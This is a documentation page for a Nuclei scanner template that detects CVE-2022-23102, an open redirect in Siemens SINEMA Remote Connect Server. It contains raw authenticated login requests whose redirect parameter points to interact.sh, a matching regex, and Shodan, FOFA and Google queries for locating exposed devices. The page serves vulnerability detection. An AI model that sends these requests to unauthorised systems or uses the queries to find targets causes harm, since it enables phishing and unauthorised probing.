Skip to content
Nuclei Templates

SINEMA Remote Connect Server < V2.0 - Open Redirect

ID: CVE-2022-23102

Severity: medium

Author: ctflearner,ritikchaddha

Tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens

Description

Section titled “Description”

A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2022-23102


info:
  name: SINEMA Remote Connect Server < V2.0 - Open Redirect
  author: ctflearner,ritikchaddha
  severity: medium
  description: |
    A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
  remediation: |
    Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-23102
    - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html
    - https://seclists.org/fulldisclosure/2022/Feb/20
    - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23102
    cwe-id: CWE-601
    epss-score: 0.00366
    epss-percentile: 0.71925
    cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: siemens
    product: sinema_remote_connect_server
    shodan-query:
      - title:"Logon - SINEMA Remote Connect"
      - http.title:"logon - sinema remote connect"
    fofa-query: title="logon - sinema remote connect"
    google-query: intitle:"logon - sinema remote connect"
  tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens


http:
  - raw:
      - |
        GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: csrftoken={{csrf}};
        Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh


        csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}


    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'


    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - "name='csrfmiddlewaretoken' value='(.*)' />"
        internal: true
# digest: 4b0a00483046022100fcb893d040feaa393bac73666607f7ed65ba55e4ecfb8d50a9c9d66d3976a4b20221008dc8bf5f891f47b658b0830a8e1ff540eadd223ec4d4e17428511be5d3745dd4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-23102.yaml"

View on Github